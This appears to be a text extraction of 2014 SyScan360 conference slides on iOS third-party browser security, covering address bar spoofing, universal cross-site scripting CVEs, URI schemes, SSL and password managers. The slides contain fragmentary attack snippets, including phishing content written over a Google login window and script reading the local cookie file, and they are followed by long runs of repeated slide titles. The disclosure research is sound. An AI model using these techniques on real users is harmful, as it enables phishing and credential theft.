mobile browsers security: ios - syscan360 apps that browse the web must use the ios webkit framework...

Mobile Browsers Security iOS

Łukasz Pilorz Paweł Wyleciał

SyScan360 2014


This presentation expresses our private opinions

The sample attacks against Google and PayPal users demonstrated in this presentation

are based on vulnerabilities in the browsers not in these websites



Thank you Marek Zmysłowski Aleksander Droś


In this presentation

bull iOS Browsers UIWebView WKWebView

bull Address Bar Spoofing

bull Universal Cross-Site Scripting

bull Popups amp URL handling

bull SSL amp password managers









iOS Browsers

iOS Browsers

iOS Browser == Mobile Safari

bull iOS App Store Review GuidelinesbdquoApps that browse the web must use the iOS WebKit framework and WebKit Javascriptrdquo

Introduction iOS Browsers

WebView-based Proxy-rendering

iOS Third-Party Browsers

gt 60 browsers in App Store

UIWebView amp WKWebView



UIWebView API

bull loadRequest

bull loadHTMLStringbaseURL

bull loadDataMIMETypetextEncodingNamebaseURL

bull goBackgoForwardstopLoadingreload

bull request (read-only)


UIWebView APIbull stringByEvaluatingJavaScriptFromString

in the origin of currently loaded requestmainDocumentURL

No access to subframesfrom other domain than

the top document

httpexamplecom

httphiddentld


JavaScript used to

implement browser features

and to override native functions to bridge them with Objective-C code


UIWebViewDelegate

bull webViewshouldStartLoadWithRequestnavigationType

bull webViewDidStartLoad

bull webViewDidFinishLoad

bull webViewdidFailLoadWithError


iOS8 beta WKWebViewbull configurationpreferences

bull configurationuserContentController

bull navigationDelegate

bull UIDelegate

bull URL (KVO)

bull hasOnlySecureContent (KVO)


Bolted-on by the browsersbull Address bar

bull Multiple tabs

bull Downloads

bull Support for untrusted SSL certificates

bull Autocomplete amp password manager

bull hellip and many more features (safety ratings malware protection cloud integration hellip)


Testing

bull Inspiration from Browser Security Handbook

bull Retesting previous Mobile Safari bugs

bull ldquoBlack-boxrdquo testing from web perspective review of JavaScript code a bit of reversing debugging

bull Cross-browser test caseshttpsiosbrowsr-testscom









Address Bar Spoofing


Address bar spoofing


Look-alike

IDN etc

URL trackingdesynchronization

URL tracking desynchronization

bull Navigate to untracked content

bull Initiate navigation interrupt overwrite content

bull Failed navigation

bull Loading loop

bull Lots of other methods (race conditions history hellip)

bull Most of them known for over 10 years (IE Netscape)


Address Bar Spoofing Untracked Content


Untracked Content

Replace window content with untracked content

documentwrite andor data URIs are usually good candidates

bull w = windowopen(lsquohttpsaccountsgooglecomrsquo) setTimeout(function()wdocumentwrite() hellip)


Untracked Content

bull CVE-2013-5152 Mobile Safari Address Bar Spoofingreported in iOS 511 fixed in iOS 7


Address Bar Spoofing Init amp Interrupt


Init amp InterruptInitialise window with target URL replace with phishing content before it loads

bull w = windowopen(lsquohttpsaccountsgooglecomrsquo) wdocumentwrite(hellip)

Optionally fall-back to native windowopen

bull delete windowopenw = windowopen(lsquohttpsaccountsgooglecomrsquo) wdocumentwrite(hellip)



Init amp Interruptbull CVE-2013-6895 Kaspersky Safe Browser

bull CVE-2013-6898 F-Secure Safe Browser

bull CVE-2013-6897 Dolphin Browser

bull hellip and 45 of tested browsers

bull Special guest star Google Chrome for Android CVE-2013-6642


Bug Bounty-)

Address Bar Spoofing Failed Navigation


Failed NavigationIncorrect URL often remains in address bar after navigation errors

bull DNS NXDOMAIN - host not found (httpslogintargettld)

bull TCP port closed (httpswwwtargettld448)

bull SSL errors (httpstargettld)

bull Display phishing page then redirect to ldquoincorrectrdquo URL

bull Mobile Safari before iOS 7 windowfocus() or windowopen()close() allowed suppressing error alerts


Address Bar Spoofing Loading loop


Loading loopbull HTTP request timeout in iOS browsers is usually

between 1 and 10 minutes

bull Address bar in Mobile Safari and many other iOS browsers is updated on navigation attempt even before an actual connection is made

bull Now we only need to find a target with filtered port 443

bull Or any filtered port because Mobile Safari shows only the hostname part of the URL


Loading loop

bull documentwrite(Phishing page here) location = httpsaccountsgooglecom8443setInterval(function() location=httpsaccountsgooglecom8443 hellip)



Phishing page

Title bar


lttitlegthttpswwwapplecomlttitlegt

Address bar tipsbull Display the URL that is currently loaded within

UIWebView not the one you think will be there

bull UIWebViewDelegate Update address bar on each event including webViewdidFailLoadWithError

bull Displaying SSL lock makes sense if there was an actual successful and valid SSL connection Spoofing https URL seems easy donrsquot make it worse by automatically adding SSL lock

bull iOS8 KVO-compliant WKWebViewURL property









UXSS UniversalCross-Site Scripting

UXSS Universal Cross-Site Scripting

Universal Cross-Site Scripting

XSS enables attackers to inject client-side script into web pages viewed by other users

bypassing same-origin policy

In UXSS the attacker exploits vulnerability in the browser not in the website

(~ httpenwikipediaorgwikiCross-site_scripting)

Famous after PDF UXSS in 2007



bull CVE-2013-6893 UXSS in Mercury Browser for iOS

bull CVE-2013-7197 UXSS in YandexBrowser for iOS

bull CVE-2012-2899 UXSS in Google Chrome for iOS

bull hellip




CVE-2013-6893UXSS in Mercury Browser


CVE-2013-6893 Mercury UXSS

w = windowopen(lsquoaboutblankrsquo)

mbexec$(WINDOW_ID)[ commandwindowopen target1234 ldquourlaboutblank ]

Mathrandom()


[webView loadRequest hellip ldquoaboutblankrdquo hellip]

cross-frame forgery


wdocumentwrite(lsquoHirsquo)

mbexec$(WINDOW_ID)[ ldquocommandwindowdocumentwrite target1234 ldquohtmlrdquoHi ]


[webView stringByEvaluatingJavaScriptFromString ldquodocumentwrite(lsquoHirsquo)rdquo]


Mercury Browser for iOS does not implement same-origin policy restrictions for cross-tab calls Any at all

w = windowopen(lsquohttpsaccountsgooglecom) wdocumentwrite(lsquoltscript src=hellipgtltscriptgtrsquo) hellipand it just works in accountsgooglecom



CVE-2013-7197UXSS in YandexBrowser


CVE-2013-7197 Yandex UXSS

bull Same-origin check implemented on windowopen()

bull Not rechecked on windowdocumentwrite()

bull Redirect child window after windowopen()

UXSS


Bug Bounty-)

CVE-2012-2899UXSS in Google Chrome


CVE-2012-2899 Chrome UXSS

bull w = windowopen(locationhref)wdocumentwrite(lsquoHirsquo)

bull [webView loadHTMLStringldquoHirdquo baseURLhref]



bull w = windowopen(lsquoaboutblankrsquo)wdocumentwrite(hellip)

bull aboutblank is kind of ldquono URLrdquo right

bull [webView loadHTMLStringldquohelliprdquo baseURLnil]



bull For baseURL = nilUIWebView loads applewebdata origin Same as file - no same-origin policy access to any web origin and local files


CVE-2012-2899 Chrome UXSSbull w = windowopen(lsquoaboutblankrsquo)

wdocumentwrite( lsquoltscriptgtdocumentwrite(locationhref)ltscriptgtrsquo )

bull applewebdata origin

bull UXSS + local file access (application sandboxjailbreak)


Bug Bounty-)

Safe cross-tab documentwrite

bull w = windowopen(locationhref) wdocumentwrite(lsquoHirsquo)

bull [webView loadHTMLStringldquoHirdquo baseURL [NSURL hellipldquoaboutblankrdquo]



bull iOS8 use WKWebViewUIDelegate webViewcreateWebViewWithConfigurationforNavigationActionwindowFeatures


Other potential paths to applewebdata or file originbull baseURL

[NSURL URLWithStringldquohttpexamplecomrdquo] mdashgt nil

bull CFURLCreateWithString(kCFAllocatorDefault CFSTR(ldquohttpexamplecom) NULL) mdashgt NULL

bull Downloads opened directly from file


Content-Disposition attachmentbull displayed in the origin of hosting site (iOS lt 5)

CVE-2011-3426 Christian Matthies Yoshinori Oota

bull isolated attachment origin (iOS 5 +)

bull documentlocationhref

bull documentreferrer

bull w=windowopen(lsquohttpsrsquo+locationhostname) wdocumentwrite(lsquocustom SOP implementationrsquo)


Content-Typebull textplain

HTML (iOS lt 7) CVE-2013-5151 Ben Toews

bull applicationoctet-stream HTML

bull applicationother filenamehtml


JS without Same-Origin-Policy

ltscriptgta = documentlocationhrefsplit() if(a[0]===file) path = lsquofile+a[3]++a[4]++a[5]++a[6]+rsquo+a[7] path = path+LibraryCookiesCookiesbinarycookies x = new XMLHttpRequest() xopen(GET path false) xsend() alert(xresponseText) ltscriptgt



ltscriptgt x = new XMLHttpRequest() xopen(lsquoGET lsquohttpsyourintranet false) xsend() alert(xresponseText)ltscriptgt


ChallengeHijack password autofill


Opening local HTML files safely

bull Open as textplain

bull Content-Security-Policy header HTML5 sandbox

bull baseURL = aboutblank

bull iOS8 WKWebViewconfigurationpreferencesjavaScriptEnabled = false









Popups amp URL handling


bull Browsers rewriting href attributes for target=_blank can be usually tricked into believing navigation was initiated by user

bull ltiframe src=ldquogooglechromeexamplecomrdquogtltiframe src=ldquomercexamplecomrdquogtetc bypass all popup blockers anywayhellip

Popup blockers


Application(bolted-on)

Native (WebKit)

bull schemedownloadhttpssecuretldvictimdata schemedownloadhttpattackertldREADMEhtml

bull schemeadd-filterurl=

Bridge (internal)

URI schemes


Registered(external)

CFURL Null Pointer Dereferencebull Any CFURL function that gets NULL as an argument

will cause Null Pointer Dereference

bull Tested with percent encodinghttp http5 http5c etc

bull Example Opera Coast ltscriptgtdocumentlocation = lsquohttp5crsquoltscriptgt


Opera Coast

Program received signal EXC_BAD_ACCESS Could not access memory

Reason KERN_INVALID_ADDRESS at address 0x00000000

0x2f3e0d76 in CFURLCopyPath()


bull Special guest star Safari on OS X Mavericksbefore Security Update 2014-02 (CVE-2014-1315)

ltiframe src=ldquolets-try-format-stringpppphelliprdquogt











SSLbull By default invalid certificates for iOS UIWebView

https requests are rejected without user interaction

bull This can be changed (eg allowing a user to accept self-signed cert)

bull 14 of tested browsersself-signed SSL certificates are silently accepted

bull In some cases the validation is done for main domain only (eg Opera Coast lt 302)

SSL amp password managers


Password managers

bull JavaScript with privileges of top frame mdashgt passwords not filled for subframes

bull Usually possible to force saving password for another domain (withwithout user interaction)

bull Password filling checks for domain but not always for URL scheme (https vs http)



Summary

bull UIWebViews should be replaced with iOS8 WKWebViews in browser applications

bull Most 3rd party iOS browsers are experimental or side projects built with less attention to detail

bull Mobile device management and other enterprise solutions often include a browser application Did you test it


Referencesbull httpsdeveloperapplecomlibraryiosdocumentation

AppleApplicationsReferenceSafariWebContent

bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebView_ClassReferenceReferencehtml

bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebViewDelegate_ProtocolReferenceReferencehtml

bull httpsdeveloperapplecomlibrarymacdocumentationcorefoundationReferenceCFURLRefReferencereferencehtml

bull httpsdeveloperapplecomlibraryprereleaseiosdocumentationWebKitReferenceWKWebView_Refindexhtml


Referencesbull httpscodegooglecompbrowsersec

bull httpwwww3orgTRCSP

bull httpwwwslidesharenetiphonepentestios-application-insecurity

bull httpslabsmwrinfosecuritycomblog20120416adventures-with-ios-uiwebviews

bull httpwwwshmoocomidn

bull httpblogchromiumorg200812security-in-depth-local-web-pageshtml

bull httpresearchmicrosoftcompubs73101guilogicsecuritypdf

bull httpgsstatcountercom


Referencesbull httpscodegooglecompchromiumissuesdetailid=146760

bull httpscodegooglecompchromiumissuesdetailid=147625





bull httpblogsoperacommobile201405opera-coast-updated-3-02

bull httpwwwf-securecomenweblabs_globalfsc-2014-4


References

bull httpbrowser-shreddersblogspotcom

bull httpsiosbrowsr-testscom


Questions


lukaszpilorzrunicpl pawelwylecialgmailcom

Twitter runicpl h0wlu

Thank you


This presentation expresses our private opinions

The sample attacks against Google and PayPal users demonstrated in this presentation

are based on vulnerabilities in the browsers not in these websites



















iOS Browsers

iOS Browsers










UIWebView API

bull loadRequest









the top document

httpexamplecom

httphiddentld


JavaScript used to




UIWebViewDelegate









bull UIDelegate

bull URL (KVO)




bull Multiple tabs

bull Downloads





Testing

















Look-alike

IDN etc






bull Loading loop






Untracked Content





Untracked Content

















Bug Bounty-)


















Loading loop




Phishing page

Title bar





























bull hellip









Mathrandom()



cross-frame forgery

















UXSS


Bug Bounty-)




















Bug Bounty-)


















































Popup blockers



Native (WebKit)



Bridge (internal)

URI schemes








Opera Coast
























Password managers






Summary






























References




Questions




Thank you



















iOS Browsers

iOS Browsers










UIWebView API

bull loadRequest









the top document

httpexamplecom

httphiddentld


JavaScript used to




UIWebViewDelegate









bull UIDelegate

bull URL (KVO)




bull Multiple tabs

bull Downloads





Testing

















Look-alike

IDN etc






bull Loading loop






Untracked Content





Untracked Content

















Bug Bounty-)


















Loading loop




Phishing page

Title bar





























bull hellip









Mathrandom()



cross-frame forgery

















UXSS


Bug Bounty-)




















Bug Bounty-)


















































Popup blockers



Native (WebKit)



Bridge (internal)

URI schemes








Opera Coast
























Password managers






Summary






























References




Questions




Thank you











UIWebView API

bull loadRequest









the top document

httpexamplecom

httphiddentld


JavaScript used to




UIWebViewDelegate









bull UIDelegate

bull URL (KVO)




bull Multiple tabs

bull Downloads





Testing

















Look-alike

IDN etc






bull Loading loop






Untracked Content





Untracked Content

















Bug Bounty-)


















Loading loop




Phishing page

Title bar





























bull hellip









Mathrandom()



cross-frame forgery

















UXSS


Bug Bounty-)




















Bug Bounty-)


















































Popup blockers



Native (WebKit)



Bridge (internal)

URI schemes








Opera Coast
























Password managers






Summary






























References




Questions




Thank you





the top document

httpexamplecom

httphiddentld


JavaScript used to




UIWebViewDelegate









bull UIDelegate

bull URL (KVO)




bull Multiple tabs

bull Downloads





Testing

















Look-alike

IDN etc






bull Loading loop






Untracked Content





Untracked Content

















Bug Bounty-)


















Loading loop




Phishing page

Title bar





























bull hellip









Mathrandom()



cross-frame forgery

















UXSS


Bug Bounty-)




















Bug Bounty-)


















































Popup blockers



Native (WebKit)



Bridge (internal)

URI schemes








Opera Coast
























Password managers






Summary






























References




Questions




Thank you


JavaScript used to




UIWebViewDelegate









bull UIDelegate

bull URL (KVO)




bull Multiple tabs

bull Downloads





Testing

















Look-alike

IDN etc






bull Loading loop






Untracked Content





Untracked Content

















Bug Bounty-)


















Loading loop




Phishing page

Title bar





























bull hellip









Mathrandom()



cross-frame forgery

















UXSS


Bug Bounty-)




















Bug Bounty-)


















































Popup blockers



Native (WebKit)



Bridge (internal)

URI schemes








Opera Coast
























Password managers






Summary






























References




Questions




Thank you


UIWebViewDelegate









bull UIDelegate

bull URL (KVO)




bull Multiple tabs

bull Downloads





Testing

















Look-alike

IDN etc






bull Loading loop






Untracked Content





Untracked Content

















Bug Bounty-)


















Loading loop




Phishing page

Title bar





























bull hellip









Mathrandom()



cross-frame forgery

















UXSS


Bug Bounty-)




















Bug Bounty-)


















































Popup blockers



Native (WebKit)



Bridge (internal)

URI schemes








Opera Coast
























Password managers






Summary






























References




Questions




Thank you





bull UIDelegate

bull URL (KVO)




bull Multiple tabs

bull Downloads





Testing

















Look-alike

IDN etc






bull Loading loop






Untracked Content





Untracked Content

















Bug Bounty-)


















Loading loop




Phishing page

Title bar





























bull hellip









Mathrandom()



cross-frame forgery

















UXSS


Bug Bounty-)




















Bug Bounty-)


















































Popup blockers



Native (WebKit)



Bridge (internal)

URI schemes








Opera Coast
























Password managers






Summary






























References




Questions




Thank you



bull Multiple tabs

bull Downloads





Testing

















Look-alike

IDN etc






bull Loading loop






Untracked Content





Untracked Content

















Bug Bounty-)


















Loading loop




Phishing page

Title bar





























bull hellip









Mathrandom()



cross-frame forgery

















UXSS


Bug Bounty-)




















Bug Bounty-)


















































Popup blockers



Native (WebKit)



Bridge (internal)

URI schemes








Opera Coast
























Password managers






Summary






























References




Questions




Thank you


Testing

















Look-alike

IDN etc






bull Loading loop






Untracked Content





Untracked Content

















Bug Bounty-)


















Loading loop




Phishing page

Title bar





























bull hellip









Mathrandom()



cross-frame forgery

















UXSS


Bug Bounty-)




















Bug Bounty-)


















































Popup blockers



Native (WebKit)



Bridge (internal)

URI schemes








Opera Coast
























Password managers






Summary






























References




Questions




Thank you













Look-alike

IDN etc






bull Loading loop






Untracked Content





Untracked Content

















Bug Bounty-)


















Loading loop




Phishing page

Title bar





























bull hellip









Mathrandom()



cross-frame forgery

















UXSS


Bug Bounty-)




















Bug Bounty-)


















































Popup blockers



Native (WebKit)



Bridge (internal)

URI schemes








Opera Coast
























Password managers






Summary






























References




Questions




Thank you






bull Loading loop






Untracked Content





Untracked Content

















Bug Bounty-)


















Loading loop




Phishing page

Title bar





























bull hellip









Mathrandom()



cross-frame forgery

















UXSS


Bug Bounty-)




















Bug Bounty-)


















































Popup blockers



Native (WebKit)



Bridge (internal)

URI schemes








Opera Coast
























Password managers






Summary






























References




Questions




Thank you




Untracked Content





Untracked Content

















Bug Bounty-)


















Loading loop




Phishing page

Title bar





























bull hellip









Mathrandom()



cross-frame forgery

















UXSS


Bug Bounty-)




















Bug Bounty-)


















































Popup blockers



Native (WebKit)



Bridge (internal)

URI schemes








Opera Coast
























Password managers






Summary






























References




Questions




Thank you


Untracked Content

















Bug Bounty-)


















Loading loop




Phishing page

Title bar





























bull hellip









Mathrandom()



cross-frame forgery

















UXSS


Bug Bounty-)




















Bug Bounty-)


















































Popup blockers



Native (WebKit)



Bridge (internal)

URI schemes








Opera Coast
























Password managers






Summary






























References




Questions




Thank you
















Bug Bounty-)


















Loading loop




Phishing page

Title bar





























bull hellip









Mathrandom()



cross-frame forgery

















UXSS


Bug Bounty-)




















Bug Bounty-)


















































Popup blockers



Native (WebKit)



Bridge (internal)

URI schemes








Opera Coast
























Password managers






Summary






























References




Questions




Thank you



















Loading loop




Phishing page

Title bar





























bull hellip









Mathrandom()



cross-frame forgery

















UXSS


Bug Bounty-)




















Bug Bounty-)


















































Popup blockers



Native (WebKit)



Bridge (internal)

URI schemes








Opera Coast
























Password managers






Summary






























References




Questions




Thank you



Phishing page

Title bar





























bull hellip









Mathrandom()



cross-frame forgery

















UXSS


Bug Bounty-)




















Bug Bounty-)


















































Popup blockers



Native (WebKit)



Bridge (internal)

URI schemes








Opera Coast
























Password managers






Summary






























References




Questions




Thank you


Title bar





























bull hellip









Mathrandom()



cross-frame forgery

















UXSS


Bug Bounty-)




















Bug Bounty-)


















































Popup blockers



Native (WebKit)



Bridge (internal)

URI schemes








Opera Coast
























Password managers






Summary






























References




Questions




Thank you




























bull hellip









Mathrandom()



cross-frame forgery

















UXSS


Bug Bounty-)




















Bug Bounty-)


















































Popup blockers



Native (WebKit)



Bridge (internal)

URI schemes








Opera Coast
























Password managers






Summary






























References




Questions




Thank you









Mathrandom()



cross-frame forgery

















UXSS


Bug Bounty-)




















Bug Bounty-)


















































Popup blockers



Native (WebKit)



Bridge (internal)

URI schemes








Opera Coast
























Password managers






Summary






























References




Questions




Thank you


















UXSS


Bug Bounty-)




















Bug Bounty-)


















































Popup blockers



Native (WebKit)



Bridge (internal)

URI schemes








Opera Coast
























Password managers






Summary






























References




Questions




Thank you





















Bug Bounty-)


















































Popup blockers



Native (WebKit)



Bridge (internal)

URI schemes








Opera Coast
























Password managers






Summary






























References




Questions




Thank you



















































Popup blockers



Native (WebKit)



Bridge (internal)

URI schemes








Opera Coast
























Password managers






Summary






























References




Questions




Thank you




Bridge (internal)

URI schemes








Opera Coast
























Password managers






Summary






























References




Questions




Thank you







Opera Coast
























Password managers






Summary






























References




Questions




Thank you





















Password managers






Summary






























References




Questions




Thank you



Summary






























References




Questions




Thank you



























References




Questions




Thank you


Questions




Thank you




Thank you


mobile browsers security: ios - syscan360 apps that browse the web must use the ios webkit framework...

Documents